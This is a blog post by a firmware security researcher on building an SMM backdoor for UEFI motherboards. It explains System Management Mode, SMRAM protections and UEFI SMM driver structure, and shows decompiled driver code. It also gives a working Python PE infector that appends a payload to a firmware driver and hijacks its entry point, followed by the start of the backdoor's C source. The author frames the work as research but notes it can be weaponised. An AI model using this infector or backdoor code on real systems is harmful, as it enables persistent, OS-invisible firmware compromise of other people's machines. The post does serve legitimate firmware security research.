Sunday, July 5, 2015

Building reliable SMM backdoor for UEFI based platforms

System Management Mode is arguably one of the coolest dark corners of the Intel IA-32 architecture. I spent the last several months learning about SMM and coding an SMM backdoor for UEFI based platforms as a weekend project. In this article I want to share the backdoor source code with you and explain how it works.

GitHub project page: https://github.com/Cr4sh/SmmBackdoor

The story started when I was inspired by recent research on SMM vulnerabilities by the Intel Security ("A New Class of Vulnerabilities in SMI Handlers") and LegbaCore ("How Many Million BIOSes Would you Like to Infect?") teams and decided to audit the firmware of my Intel DQ77KB motherboard for similar vulnerabilities. To reverse engineer SMM code you first need to dump the System Management RAM where it lives, which is not that easy. The most obvious ways to do it are to patch the motherboard firmware and disable SMRAM protection so that non-SMM code can access it, or to write an exploit for some firmware vulnerability that allows reading SMRAM contents, like the boot script table vulnerability (CERT VU #976132) that was described in my previous blog post about UEFI. A significant disadvantage of both approaches is that they're very model specific, and you may spend an unpredictable amount of time porting them to a new test platform.

To get a better solution I decided to code a firmware backdoor that runs in SMM and provides an interface for dumping SMRAM from less privileged code and doing some other useful things. Later I also wrote an additional backdoor payload that escalates privileges of user mode processes under a 64-bit GNU/Linux operating system using SMM magic. Of course, this backdoor is a research tool rather than malware: to install it you need a hardware SPI programmer and physical access to the target machine. However, as other researchers have shown, it’s also possible to weaponise such a backdoor with a proper UEFI exploit that infects the firmware from a running operating system in a software-only way.

SMM security is not a new theme among researchers: in the last 10 years there have been a lot of publications about SMM itself and its usage for various evil purposes. However, most of this research was done during the legacy BIOS era. Nowadays, when PC vendors have switched from legacy BIOS to UEFI, SMM security with its UEFI related aspects is more relevant than ever.

System Management Mode basics


SMM is a special execution mode of the IA-32 architecture that was introduced with the Intel 386SL processor. Chapter 34 of the Intel 64 and IA-32 Architectures Software Developer’s Manual is the main source of information about its design and usage:

SMM is a special-purpose operating mode provided for handling system-wide functions like power management, system hardware control, or proprietary OEM-designed code. It is intended for use only by system firmware, not by applications software or general-purpose systems software. The main benefit of SMM is that it offers a distinct and easily isolated processor environment that operates transparently to the operating system or executive and software applications.

Some time ago SMM was used by BIOS developers mostly for power management and legacy device emulation, for example PS/2 support (ports 60h/64h) for USB keyboards and mice. Nowadays it's also widely used for firmware and platform security purposes.

Why is SMM interesting for hackers?
  • In the UEFI specification SMM plays a very important role in implementing the platform security mechanisms that protect the firmware image stored in the flash chip on the motherboard from unauthorised modifications by malicious software.
  • SMM is an excellent place to hide OS independent and invisible malware. This execution mode has extreme power over all other software that runs on the CPU, even the OS kernel or a VT-x hypervisor.
SMM executable code and data live inside SMRAM, and when SMRAM is locked it can't be accessed by operating system code or user mode software. System firmware (legacy BIOS or UEFI) copies SMM code into SMRAM and locks it during platform initialization.

The processor switches to SMM only through a System Management Interrupt (SMI): it saves the current execution context into SMRAM and starts executing the SMI handler, which can exit from SMM and resume execution from the saved context using the RSM instruction.

The System Management Interrupt has the highest priority and can’t be masked. The most important facts about the SMI handler execution environment:
  • Similar to 16-bit real address mode with paging disabled.
  • CS segment base is SMRAM base, EIP is 8000h.
  • Segment limits are set to 4 GBytes, you can switch to protected mode or long mode to access all of the physical memory.
  • All I/O ports are available.
  • SMM code can read or modify saved execution context.
  • SMM code can set its own IDT and use software interrupts.
As you can see, SMM code is completely inaccessible from the OS, and the OS can’t even notice when exactly an SMI is being handled. There are several ways to generate an SMI:
  • Ring 0 code can trigger a software SMI at any time by writing a byte value to APMC I/O port B2h.
  • Internal chipset registers (SMI_EN, GEN_PMCON_1 and others) that are accessible via PCI config space allow enabling or disabling different kinds of hardware SMI sources.
  • You can route hardware interrupts into SMM by reconfiguring the advanced programmable interrupt controller (APIC) that is integrated into the CPU.
  • The I/O instruction restart CPU feature (chapter 34.12 of the IA-32 Architectures Software Developer’s Manual) allows generating an SMI on any I/O port access by the IN or OUT processor instructions.
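The software SMI case from the list above is easy to sketch. The snippet is a minimal illustration only, assuming Python 3 on Linux, where the /dev/port device exposes I/O port space to root. The helper name trigger_sw_smi and the idea of passing an already opened file object are assumptions made for this example and are not part of the backdoor code. What the firmware does with a given byte value is entirely platform specific.

```python
APMC_PORT = 0xB2  # APMC I/O port used for software SMI generation


def trigger_sw_smi(port_file, code):
    """Write one byte to the APMC port through a /dev/port-like file object.

    port_file is any seekable binary file object; on a real Linux system it
    would be /dev/port opened by root (assumption, see the usage note).
    """
    if not 0 <= code <= 0xFF:
        raise ValueError('SMI command value must fit into one byte')

    # for /dev/port the file offset is the I/O port number
    port_file.seek(APMC_PORT)
    port_file.write(bytes([code]))


# Hypothetical usage on real hardware (requires root, not executed here):
#
#   with open('/dev/port', 'r+b', buffering=0) as fd:
#       trigger_sw_smi(fd, 0xCC)
```

Taking a file object instead of a path keeps the helper testable with an in-memory buffer, without touching real hardware.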
SMRAM can be located in the Compatible Memory Segment (CSEG), High Memory Segment (HSEG) or Top of Memory Segment (TSEG) system memory regions. The memory management features behind SMM and SMRAM are hardware-specific. I’m using an Intel DQ77KB motherboard with a Core i5-2500 CPU as the test platform, so the information in this article is given according to the datasheets for that hardware.

CSEG is the default SMRAM region, located at the fixed address range A0000h:BFFFFh of non-cacheable physical memory (it overlaps VGA memory). CSEG was used mostly by legacy BIOS developers; modern systems can use (and actually do use) other SMRAM locations: HSEG or TSEG. They can offer 8 MB of cacheable memory for SMM code and data, which should be enough even for the relatively complicated UEFI SMM Foundation core and drivers.

Here you can see the physical memory map from the processor datasheet:


CSEG is located inside the legacy address range below the first MB of memory. You may notice that there’s no HSEG area in the picture: my CPU doesn’t support it. The interesting thing about TSEG is that the CPU stores its address in an internal register that is not directly accessible by software; this value is calculated automatically in the following way:

TSEG ADDR = TOLUD – DSM SIZE – GSM SIZE – TSEG SIZE

... where TOLUD is Top of Low Usable DRAM, DSM SIZE is the size of Data Stolen Memory and GSM SIZE is the size of GTT Stolen Memory.
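As a quick worked example, the formula can be evaluated like this. The register values below are hypothetical numbers picked for illustration and were not read from the DQ77KB board; the function name tseg_base is also just an assumption of this sketch.

```python
MB = 1 << 20


def tseg_base(tolud, dsm_size, gsm_size, tseg_size):
    """TSEG ADDR = TOLUD - DSM SIZE - GSM SIZE - TSEG SIZE (all in bytes)."""
    base = tolud - dsm_size - gsm_size - tseg_size
    if base < 0:
        raise ValueError('stolen memory regions are larger than TOLUD')
    return base


# hypothetical platform: 32 MB of DSM, 2 MB of GSM and 8 MB of TSEG
example = tseg_base(tolud=0xDFA00000, dsm_size=32 * MB,
                    gsm_size=2 * MB, tseg_size=8 * MB)
print(hex(example))  # prints 0xdd000000
```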

The System Management RAM Control register (SMRAMC) controls the presence of the CSEG/HSEG/TSEG regions and their accessibility from execution modes less privileged than SMM. Here’s the description of its bits:


System firmware sets the SMRAMC value during platform initialization and locks the register: all fields become read-only until the next full reset. On a properly configured system D_LCK must be 1 and D_OPEN must be 0, which means that SMRAM will be accessible only from code that runs in SMM. The G_SMRAME field controls the presence of CSEG and C_BASE_SEG is responsible for HSEG and TSEG. On my hardware C_BASE_SEG is read-only with the predefined value 010b.
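The lock check described above can be sketched as a small decoder. The bit positions used here (C_BASE_SEG in bits 2:0, G_SMRAME in bit 3, D_LCK in bit 4, D_CLS in bit 5, D_OPEN in bit 6) are an assumption based on Intel desktop processor datasheets and should be verified against the datasheet of your own platform. The function names are made up for this example.

```python
from collections import namedtuple

Smramc = namedtuple('Smramc', 'c_base_seg g_smrame d_lck d_cls d_open')


def decode_smramc(value):
    """Split an 8-bit SMRAMC value into its fields (assumed bit layout)."""
    return Smramc(
        c_base_seg=value & 0x7,           # bits 2:0
        g_smrame=bool(value & (1 << 3)),  # bit 3
        d_lck=bool(value & (1 << 4)),     # bit 4
        d_cls=bool(value & (1 << 5)),     # bit 5
        d_open=bool(value & (1 << 6)),    # bit 6
    )


def is_smram_locked(value):
    """Properly configured system: D_LCK = 1 and D_OPEN = 0."""
    fields = decode_smramc(value)
    return fields.d_lck and not fields.d_open


# 0x1A = 0001 1010b: C_BASE_SEG = 010b, G_SMRAME = 1, D_LCK = 1, D_OPEN = 0
print(decode_smramc(0x1A), is_smram_locked(0x1A))
```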

There are also other registers that should be properly configured and locked by firmware to protect SMRAM from various attacks:
  • The Top of Upper Usable DRAM (TOUUD), Top of Low Usable DRAM (TOLUD), REMAPLIMIT and REMAPBASE registers that are used to configure the physical memory map must be locked by firmware to protect SMRAM from memory remapping attacks. For more information check the "System Management Mode Design and Security Issues" and "Preventing and Detecting Xen Hypervisor Subversions" white papers.
  • The TSEGMB register defines the address of the memory region that should be protected from DMA access; firmware must configure and lock it. For more information check the "Attacking UEFI Boot Script" white paper.
  • System Management Range Registers (SMRR): a pair of MSRs, IA32_SMRR_PHYSBASE and IA32_SMRR_PHYSMASK, that can be modified only by SMM code. Because HSEG and TSEG memory is cacheable, SMRR must be configured to protect it from SMM cache poisoning attacks. For more information check the "Attacking SMM Memory via Intel CPU Cache Poisoning" white paper.
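To make the SMRR item more concrete, here is a minimal sketch of how the two MSR values describe a protected range. It assumes the layout given in the Intel Software Developer’s Manual as I understand it: the base and mask live in bits 31:12, the memory type in bits 7:0 of IA32_SMRR_PHYSBASE and the valid flag in bit 11 of IA32_SMRR_PHYSMASK. The sample values are hypothetical and the helper names are made up for this example.

```python
ADDR_BITS = 0xFFFFF000  # bits 31:12 hold the base and the mask
VALID_BIT = 1 << 11     # IA32_SMRR_PHYSMASK valid flag


def decode_smrr(physbase, physmask):
    """Decode the SMRR MSR pair into base, mask, size, type and valid flag."""
    mask = physmask & ADDR_BITS
    return {
        'base': physbase & ADDR_BITS,
        'mask': mask,
        'size': ((~mask) & 0xFFFFFFFF) + 1,  # valid for contiguous masks
        'type': physbase & 0xFF,
        'valid': bool(physmask & VALID_BIT),
    }


def in_smrr(addr, physbase, physmask):
    """An address is covered when (addr & mask) == (base & mask)."""
    r = decode_smrr(physbase, physmask)
    return r['valid'] and (addr & r['mask']) == (r['base'] & r['mask'])


# hypothetical 8 MB write-back (type 6) range at 0xDD000000
info = decode_smrr(0xDD000006, 0xFF800800)
print(hex(info['base']), hex(info['size']), info['valid'])
```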

UEFI SMM foundation


Unified Extensible Firmware Interface (UEFI) is a standard firmware architecture for PCs that is used in most of the modern computers and notebooks available on the market. UEFI provides a lot of abstractions over the architectural mechanisms of SMM that were described above. For more information about UEFI design please refer to the UEFI Platform Initialization Specification.

The UEFI boot sequence consists of several platform initialization (PI) phases; each PI phase has its own execution environment and API:


The PEI phase was described in my previous article about the UEFI boot script table vulnerability. The S3 resume boot path that was mentioned in that article is not shown in the picture above.

The DXE phase begins when the PEI core transfers execution to the DxeMain() function of the DXE core module that is stored in a Firmware File System (FFS) image inside the ROM chip on the motherboard. The DXE core loads other DXE drivers from FFS; these drivers can use EFI boot services (described by the EFI_BOOT_SERVICES structure) and EFI runtime services (described by the EFI_RUNTIME_SERVICES structure). This phase is quite similar to PEI: loaded DXE drivers can register new UEFI protocol interfaces using the EFI_BOOT_SERVICES.InstallProtocolInterface() function, get notifications about protocol registration using EFI_BOOT_SERVICES.RegisterProtocolNotify(), or look up existing protocols using EFI_BOOT_SERVICES.LocateProtocol() and EFI_BOOT_SERVICES.LocateHandle(). The DXE phase ends when the EFI OS loader calls the EFI_BOOT_SERVICES.ExitBootServices() function before handing control to the operating system kernel. During the runtime phase only the functions of EFI_RUNTIME_SERVICES are available to the running OS.

The SMM phase is an optional phase that starts in DXE and runs in parallel with the other PI phases into runtime. Volume 4 of the Platform Initialization Specification, System Management Mode Core Interface, tells us that the SMM phase consists of two parts:
  • SMRAM initialization: during DXE, an SMM related driver opens SMRAM, creates the SMRAM memory map and provides the necessary services to launch SMM-related drivers, and then, before boot, closes and locks SMRAM.
  • SMI management: when an SMI is generated, the driver execution environment is created, then the SMI sources are detected and the SMI handlers are called.
The EFI Development Kit II source code has an open source implementation of the SMM protocols, but the code isn't complete because these protocols are hardware specific. For a more useful implementation you may have a look at the Intel Quark Board Support Package. Please note that the Quark BSP supports only the i386 architecture (the Intel Quark SoC has no long mode support), while the UEFI firmware of most PCs uses x86_64 code for SMM. Also, the "EDK II SMM call topology" document provides an excellent walkthrough of these open source projects.

The SMM phase starts with the cooperation of several DXE drivers that should implement the following UEFI protocols:
  • EFI_SMM_ACCESS2_PROTOCOL: describes the different SMRAM regions available in the system.
  • EFI_SMM_CONTROL2_PROTOCOL: used to initiate synchronous SMI activations.
  • EFI_SMM_BASE2_PROTOCOL: used to locate the System Management Services Table (SMST) during SMM driver initialization.
  • EFI_SMM_CONFIGURATION_PROTOCOL: mandatory protocol published by a DXE CPU driver to indicate which areas within SMRAM are reserved for use by the CPU for any purpose, such as stack, save state or SMM entry point.
  • EFI_SMM_COMMUNICATION_PROTOCOL: provides a means of communicating between drivers outside of SMM and SMI handlers inside of SMM.
  • EFI_DXE_SMM_READY_TO_LOCK_PROTOCOL: mandatory protocol published by a DXE driver to indicate that SMM is about to be locked. The registration notify callback for this protocol usually invokes the EFI_SMM_ACCESS2_PROTOCOL.Lock() function to lock SMRAM.
EFI_SMM_ACCESS2_PROTOCOL, EFI_SMM_CONTROL2_PROTOCOL and EFI_SMM_BASE2_PROTOCOL are present starting from version 1.0 of the Platform Initialization Specification; they replace EFI_SMM_ACCESS_PROTOCOL, EFI_SMM_CONTROL_PROTOCOL and EFI_SMM_BASE_PROTOCOL from previous versions of the specification. Nowadays most BIOS vendors use the new protocols, but some old hardware may support only the old ones, which means that a reliable SMM backdoor for real life purposes should be able to work with both sets of protocols.

There are three types of DXE phase drivers involved in SMM initialization:
  • DXE drivers: regular DXE phase drivers that are loaded into system memory by the DXE core driver.
  • SMM drivers: drivers that are launched once, directly into SMRAM, during SMM phase initialization.
  • SMM/DXE combined drivers: drivers that are loaded twice, once as a DXE driver and once as an SMM driver.
All these drivers have the same entry point function signature:
typedef
EFI_STATUS
(EFIAPI * EFI_IMAGE_ENTRY_POINT) (
    IN EFI_HANDLE ImageHandle,
    IN EFI_SYSTEM_TABLE *SystemTable
);

SMM and SMM/DXE combined drivers can use EFI_BOOT_SERVICES functions and DXE protocols only at the entry point; protocols and callbacks that are invoked during SMI management should use only SMST functions and SMM protocols.

Here is SMM system table structure from EDK2 source with some of my additional comments:
//
// System Management System Table (SMST)
//
// The System Management System Table (SMST) is a table that contains a collection of common 
// services for managing SMRAM allocation and providing basic I/O services. These services are 
// intended for both preboot and runtime usage.
//
struct _EFI_SMM_SYSTEM_TABLE2 
{
    // The table header for the SMST.
    EFI_TABLE_HEADER Hdr;

    // A pointer to a NULL-terminated Unicode string containing the vendor name.
    // It is permissible for this pointer to be NULL.
    CHAR16 *SmmFirmwareVendor;
    
    // The particular revision of the firmware.
    UINT32 SmmFirmwareRevision;

    // Adds, updates, or removes a configuration table entry from the SMST.
    EFI_SMM_INSTALL_CONFIGURATION_TABLE2 SmmInstallConfigurationTable; 

    // I/O Service
    EFI_SMM_CPU_IO2_PROTOCOL SmmIo;

    //
    // Runtime memory services                               
    //

    // Allocates pool memory from SMRAM.
    EFI_ALLOCATE_POOL SmmAllocatePool;

    // Returns SMRAM pool memory to system.
    EFI_FREE_POOL SmmFreePool;
 
    // Allocates page memory from SMRAM.
    EFI_ALLOCATE_PAGES SmmAllocatePages;

    // Returns pages of memory to the system.
    EFI_FREE_PAGES SmmFreePages;

    // Execute caller-provided code stream on one distinct application processor while in SMM.
    EFI_SMM_STARTUP_THIS_AP SmmStartupThisAp;
                                                              
    //
    // CPU information records
    //

    // A number between zero and the NumberOfCpus field. This field designates 
    // which processor is executing the SMM infrastructure.
    UINTN CurrentlyExecutingCpu;
    
    // The number of possible processors in the platform.  This is a 1 based counter.
    UINTN NumberOfCpus;
    
    // Points to an array, where each element describes the number of bytes in the 
    // corresponding save state specified by CpuSaveState. There are always 
    // NumberOfCpus entries in the array. 
    UINTN *CpuSaveStateSize;
    
    // Points to an array, where each element is a pointer to a CPU save state. The 
    // corresponding element in CpuSaveStateSize specifies the number of bytes in the 
    // save state area. There are always NumberOfCpus entries in the array.
    VOID **CpuSaveState;      

    //
    // Extensibility table
    //

    // The number of UEFI Configuration Tables in the buffer SmmConfigurationTable.
    UINTN NumberOfTableEntries;
    
    // A pointer to the UEFI Configuration Tables. The number of entries in the table is 
    // NumberOfTableEntries. 
    EFI_CONFIGURATION_TABLE *SmmConfigurationTable;

    //
    // Protocol services
    //

    // Installs a SMM protocol interface.
    EFI_INSTALL_PROTOCOL_INTERFACE SmmInstallProtocolInterface;

    // Removes a SMM protocol interface.
    EFI_UNINSTALL_PROTOCOL_INTERFACE SmmUninstallProtocolInterface;

    // Queries a handle to determine if it supports a specified SMM protocol.
    EFI_HANDLE_PROTOCOL SmmHandleProtocol;
                                                                          
    // Registers a callback function to be called when a particular protocol interface is installed.
    EFI_SMM_REGISTER_PROTOCOL_NOTIFY SmmRegisterProtocolNotify;

    // Returns an array of handles that support a specified protocol.
    EFI_LOCATE_HANDLE SmmLocateHandle;

    // Returns the first SMM protocol instance that matches the given protocol.
    EFI_LOCATE_PROTOCOL SmmLocateProtocol;

    //
    // SMI Management functions
    //

    // Manage SMI of a particular type.
    EFI_SMM_INTERRUPT_MANAGE SmiManage;
 
    // Registers a handler to execute within SMM.
    EFI_SMM_INTERRUPT_REGISTER SmiHandlerRegister;
 
    // Unregister a handler in SMM.
    EFI_SMM_INTERRUPT_UNREGISTER SmiHandlerUnRegister;
};

In addition to the previously described DXE phase protocols, SMM drivers can also use the following SMM-only protocols during SMI management:
  • EFI_SMM_STATUS_CODE_PROTOCOL: reports SMM code errors to other UEFI PI components.
  • EFI_SMM_CPU_PROTOCOL: provides access to the saved CPU execution state.
  • EFI_SMM_CPU_IO2_PROTOCOL: provides CPU I/O and memory access for SMM code.
  • EFI_SMM_PCI_ROOT_BRIDGE_IO_PROTOCOL: provides the basic memory, I/O, PCI configuration, and DMA interfaces that are used to abstract accesses to PCI controllers behind a PCI root bridge controller.
  • EFI_SMM_READY_TO_LOCK_SMM_PROTOCOL: mandatory protocol published by the SMM Foundation to indicate that SMRAM is about to be locked.
  • EFI_SMM_END_OF_DXE_PROTOCOL: similar to EFI_SMM_READY_TO_LOCK_SMM_PROTOCOL, published by the PI platform code prior to invoking any 3rd party content, including option ROMs and UEFI executables that are not from the platform manufacturer.

Writing SMM/DXE combined drivers


SMM/DXE combined drivers look very neat for evil purposes: you can have a single backdoor with the ability to execute both DXE and SMM phase payloads.

I expected difficulties finding a usable example of such drivers in public sources like EDK2, Quark BSP or others. In fact, there are only two publicly available articles about UEFI SMM driver development: "EFI Howto, Write a SMM Driver" and "BIOS Undercover: Writing A Software SMI Handler". Both of them are outdated, incomplete or vendor-specific.

To learn how to write combined drivers I decided to do a bit of reverse engineering on an existing combined driver from my motherboard’s firmware. This time I used UEFITool by Nikolaj Schlej to work with the flash image. If you need to modify and rebuild firmware, this excellent tool works much better than uefi-firmware-parser, which was mentioned in my previous article.

As my target I took the combined driver named 26A2481E-4424-46A2-9943-CC4039EAD8F8 (Google says that this GUID belongs to the S3Save UEFI driver, but for our purposes it doesn’t matter):


After extracting the driver’s body let’s load it into IDA Pro and look at the code around the module entry point. The PEI module reverse engineering tips and tricks from the previous article are applicable to DXE and SMM drivers as well. There’s only one major difference: DXE and SMM phase code uses the x86_64 architecture instead of the i386 used for PEI.
DWORD __stdcall EntryPoint(PVOID ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
{
    EFI_SYSTEM_TABLE *v2; // rbx@1
    PVOID v3; // rdi@1

    v2 = SystemTable;
    v3 = ImageHandle;

    // initialize global variables for image handle and system tables
    sub_180002074(ImageHandle, SystemTable);

    // do the stuff
    return sub_180001FD0(v3, v2);
}

EFI_RUNTIME_SERVICES * __fastcall sub_180002074(PVOID ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
{
    EFI_RUNTIME_SERVICES *v2; // rax@2

    if (!gST)
    {
        gST = SystemTable;
        gBS = SystemTable->BootServices;
        v2 = SystemTable->RuntimeServices;
        gImageHandle = ImageHandle;
        gRuntimeServices = v2;
    }

    return v2;
}

DWORD __fastcall sub_180001FD0(PVOID ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
{
    EFI_SYSTEM_TABLE *v2; // rbx@1
    PVOID v3; // rdi@1
    __int64 v4; // rax@1
    char v6; // [sp+38h] [bp+10h]@1

    v2 = SystemTable;
    v3 = ImageHandle;
    bInSmm = 0;

    // perform various initializations
    sub_180002074(ImageHandle, SystemTable);

    // locate EFI_SMM_BASE2_PROTOCOL
    LODWORD(v4) = v2->BootServices->LocateProtocol(
        &gEfiSmmBase2ProtocolGuid,
        0i64,
        &gEfiSmmBase2Protocol
    );
    if (v4 & 0x8000000000000000)
    {
        if (v4 != 0x800000000000000E)
        {
            return 3;
        }

        bInSmm = 0;

        // EFI_SMM_BASE2_PROTOCOL was not found, do the DXE stuff
        return sub_180001F54(v3, v2);
    }

    gEfiSmmBase2Protocol->InSmm(gEfiSmmBase2Protocol, &bInSmm);
    if (!bInSmm)
    {
        // EFI_SMM_BASE2_PROTOCOL found but we are not in SMM, do the DXE stuff
        return sub_180001F54(v3, v2);
    }

    // driver loaded into SMRAM, do the SMM stuff
    return sub_180001ED8(v3, v2);
}

int __fastcall sub_180001ED8(void *a1, EFI_SYSTEM_TABLE *a2)
{
    __int64 v2; // rax@1
    __int64 v3; // rax@3

    // perform various SMM initializations
    LODWORD(v2) = sub_1800021D8(a1, a2);

    if (!(v2 & 0x8000000000000000))
    {
        LODWORD(v2) = sub_180000610(1);

        if (!(v2 & 0x8000000000000000))
        {
            // get location of System Management Service Table
            LODWORD(v3) = gEfiSmmBase2Protocol->GetSmstLocation(
                gEfiSmmBase2Protocol,
                &gSMST
            );
            if (v3 & 0x8000000000000000 || !gSMST)
            {
                // error: unable to locate SMST
                LODWORD(v2) = 3;
            }
            else
            {
                // do the rest of SMM stuff
                // ...
            }
        }
    }

    return v2;
}

As you can see, the entry point of this module calls the sub_180002074() function that initializes global variables. sub_180001FD0() uses EFI_SMM_BASE2_PROTOCOL.InSmm() to determine whether the driver runs in SMM. When the driver was loaded as DXE, sub_180001F54() is called to perform DXE related operations. When it was loaded in SMM, sub_180001ED8() is called: it locates the SMST with EFI_SMM_BASE2_PROTOCOL.GetSmstLocation() and continues with various SMM related stuff.
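The magic numbers in the decompiled code are 64-bit EFI_STATUS values: the highest bit marks an error and the low bits hold the error number, so 0x800000000000000E is EFI_NOT_FOUND. A small helper like the following sketch can make IDA output easier to read. The function names are made up for this example, and the table only lists a few codes from the UEFI specification.

```python
EFI_ERROR_BIT = 1 << 63  # high bit of a 64-bit EFI_STATUS marks an error

# partial table of status codes, only what is needed for this example
EFI_STATUS_NAMES = {
    0: 'EFI_SUCCESS',
    EFI_ERROR_BIT | 2: 'EFI_INVALID_PARAMETER',
    EFI_ERROR_BIT | 3: 'EFI_UNSUPPORTED',
    EFI_ERROR_BIT | 14: 'EFI_NOT_FOUND',
}


def efi_error(status):
    """Python counterpart of the check `v4 & 0x8000000000000000`."""
    return bool(status & EFI_ERROR_BIT)


def efi_status_name(status):
    """Return a symbolic name, or the hex value for codes not in the table."""
    return EFI_STATUS_NAMES.get(status, hex(status))


print(efi_status_name(0x800000000000000E))  # prints EFI_NOT_FOUND
```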

Running your code in SMM


As was said, to run custom code in SMM you need a hardware programmer. If your board has a COM port, it can be very useful for reading the debug output of SMM code.

In the picture you can see my test setup that was mentioned in the previous article:


When it was clear how an SMM/DXE combined driver should work, I wrote a simple hello world driver that uses EFI_SMM_BASE2_PROTOCOL to locate the SMST and print its address to debug output. First I decided to add the driver’s image to the FFS volume as a new file, but when I flashed my test system with the updated firmware image, the hello world driver wasn’t loaded. I still don’t know the exact reason for this behaviour: probably there was something wrong with the PE/FFS headers or the driver load order dependencies. There’s at least one good thing, though: the modified firmware functions fine, which means that the Intel DQ77KB board doesn’t use any custom mechanisms to verify the integrity of the firmware image or FFS volumes.

For the next attempt, to avoid wasting time on reverse engineering and debugging, I decided to infect the PE image of the existing combined driver that was featured above.

Using Python and the pefile library I wrote a trivial PE file infector that appends the payload PE image to the last section of the target image and hooks its entry point to execute the payload on image load:
from struct import pack, unpack

# see struct _INFECTOR_CONFIG in SmmBackdoor.h
INFECTOR_CONFIG_SECTION = b'.conf'
INFECTOR_CONFIG_FMT = 'QI'
INFECTOR_CONFIG_LEN = 8 + 4

# IMAGE_DOS_HEADER.e_res magic constant to mark infected file
# (pefile exposes section names and e_res as byte strings)
INFECTOR_SIGN = b'INFECTED'

# infect src image with payload and optionally save it to dst
def infect(src, payload, dst = None):

    import pefile

    def _infector_config_offset(pe):
        
        for section in pe.sections:

            # find .conf section of payload image
            if section.Name[: len(INFECTOR_CONFIG_SECTION)] == INFECTOR_CONFIG_SECTION:

                return section.PointerToRawData

        raise Exception('Unable to find %s section' % INFECTOR_CONFIG_SECTION)

    def _infector_config_get(pe, data):

        offs = _infector_config_offset(pe)
        
        return unpack(INFECTOR_CONFIG_FMT, data[offs : offs + INFECTOR_CONFIG_LEN])        

    def _infector_config_set(pe, data, *args):

        offs = _infector_config_offset(pe)

        return data[: offs] + \
               pack(INFECTOR_CONFIG_FMT, *args) + \
               data[offs + INFECTOR_CONFIG_LEN :]

    # load target image
    pe_src = pefile.PE(src)

    # load payload image
    pe_payload = pefile.PE(payload)
    
    if pe_src.DOS_HEADER.e_res == INFECTOR_SIGN:

        raise Exception('%s is already infected' % src)        

    if pe_src.FILE_HEADER.Machine != pe_payload.FILE_HEADER.Machine:

        raise Exception('Architecture mismatch')

    # read payload image data into the string
    data = open(payload, 'rb').read()

    # read _INFECTOR_CONFIG, this structure is located at .conf section of payload image
    conf_ep_new, conf_ep_old = _infector_config_get(pe_payload, data)    

    last_section = None
    for section in pe_src.sections:

        # find last section of target image
        last_section = section

    if last_section.Misc_VirtualSize > last_section.SizeOfRawData:

        raise Exception('Last section virtual size must be less or equal than raw size')

    # save original entry point address of target image
    conf_ep_old = pe_src.OPTIONAL_HEADER.AddressOfEntryPoint

    # write updated _INFECTOR_CONFIG back to the payload image
    data = _infector_config_set(pe_payload, data, conf_ep_new, conf_ep_old)

    # set new entry point of target image
    pe_src.OPTIONAL_HEADER.AddressOfEntryPoint = \
        last_section.VirtualAddress + last_section.SizeOfRawData + conf_ep_new

    # update last section size
    last_section.SizeOfRawData += len(data)
    last_section.Misc_VirtualSize = last_section.SizeOfRawData

    # make it executable
    last_section.Characteristics = pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] | \
                                   pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] | \
                                   pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']

    # update image headers
    pe_src.DOS_HEADER.e_res = INFECTOR_SIGN
    pe_src.OPTIONAL_HEADER.SizeOfImage = \
        last_section.VirtualAddress + last_section.Misc_VirtualSize

    # get infected image data
    data = pe_src.write() + data

    if dst is not None:

        with open(dst, 'wb') as fd:

            # save infected image to the file
            fd.write(data)

    return data
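The way the infector patches the _INFECTOR_CONFIG structure can be tried in isolation, without pefile or a real driver image. The following sketch works on a synthetic byte buffer. It uses an explicit little-endian '<QI' format (the infector itself uses the native 'QI'), and the offsets and entry point values are made-up numbers for illustration only.

```python
from struct import calcsize, pack, unpack

CONFIG_FMT = '<QI'  # 64-bit new entry point, 32-bit original entry point RVA
CONFIG_LEN = calcsize(CONFIG_FMT)  # 12 bytes


def config_get(data, offs):
    """Read (ep_new, ep_old) from the raw image data at the given offset."""
    return unpack(CONFIG_FMT, data[offs: offs + CONFIG_LEN])


def config_set(data, offs, ep_new, ep_old):
    """Return a copy of data with the config at offs replaced."""
    return data[: offs] + pack(CONFIG_FMT, ep_new, ep_old) + \
           data[offs + CONFIG_LEN:]


# synthetic "payload image": 4 bytes of padding around an empty config
blob = b'\x00' * 4 + pack(CONFIG_FMT, 0x1234, 0) + b'\x00' * 4

# store a hypothetical original entry point RVA of the target image
patched = config_set(blob, 4, 0x1234, 0x2C0)
print(config_get(patched, 4))  # prints (4660, 704)
```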

As was said, the infector payload is just a regular PE image of a DXE/SMM combined driver. After load, this image updates its base relocations, performs backdoor initialization and transfers execution to the original entry point of the infected image (its RVA was saved by the infector in the .conf section of the payload image).
// file: SmmBackdoor.c

// UEFI SMM foundation headers
#include <FrameworkSmm.h>

// required EDK protocols
#include <Protocol/LoadedImage.h>
#include <Protocol/SmmCpu.h>
#include <Protocol/SmmBase2.h>
#include <Protocol/SmmAccess2.h>
#include <Protocol/SmmSwDispatch2.h>
#include <Protocol/SmmPeriodicTimerDispatch2.h>
#include <Protocol/DevicePath.h>
#include <Protocol/SerialIo.h>

// required EDK libraries
#include <Library/UefiDriverEntryPoint.h>
#include <Library/UefiBootServicesTableLib.h>
#include <Library/DebugLib.h>
#include <Library/DevicePathLib.h>
#include <Library/UefiRuntimeLib.h>
#include <Library/SynchronizationLib.h>

// PE image structures
#include <IndustryStandard/PeImage.h>

#include "config.h"
#include "common.h"
#include "printf.h"
#include "debug.h"
#include "loader.h"
#include "SmmBackdoor.h"

#include "asm/common_asm.h"

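// this function will be used as entry point of infected image
EFI_STATUS
BackdoorEntryInfected(
    EFI_HANDLE ImageHandle,
    EFI_SYSTEM_TABLE *SystemTable
);

// regular entry point, declared here because BackdoorEntryInfected() calls it
// before its definition
EFI_STATUS
BackdoorEntry(
    IN EFI_HANDLE ImageHandle,
    IN EFI_SYSTEM_TABLE *SystemTable
);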

#pragma section(".conf", read, write)

// PE image section with information for infector
__declspec(allocate(".conf")) INFECTOR_CONFIG m_InfectorConfig = 
{ 
    // new entry point address of infected file
    (PVOID)&BackdoorEntryInfected,

    // old entry point address (will be set by infector)
    0
};

// DXE and runtime phase API
EFI_SYSTEM_TABLE *gST;
EFI_BOOT_SERVICES *gBS;
EFI_RUNTIME_SERVICES *gRT;

// SMM phase API
